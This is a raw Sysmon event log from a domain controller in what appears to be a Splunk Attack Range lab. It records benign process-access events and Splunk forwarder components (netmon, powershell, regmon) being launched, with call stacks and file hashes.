13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85D2-5FCF-0201-000000009101}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D2-5FCF-0201-000000009101}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.449{10ACEC4A-85D2-5FCF-0201-000000009101}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.369{10ACEC4A-85D4-5FCF-0301-000000009101}7324276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D4-5FCF-0301-000000009101}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85D4-5FCF-0301-000000009101}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.228{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D4-5FCF-0301-000000009101}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:32.229{10ACEC4A-85D4-5FCF-0301-000000009101}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.930{10ACEC4A-85D5-5FCF-0501-000000009101}41004916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D5-5FCF-0501-000000009101}4100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:33.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 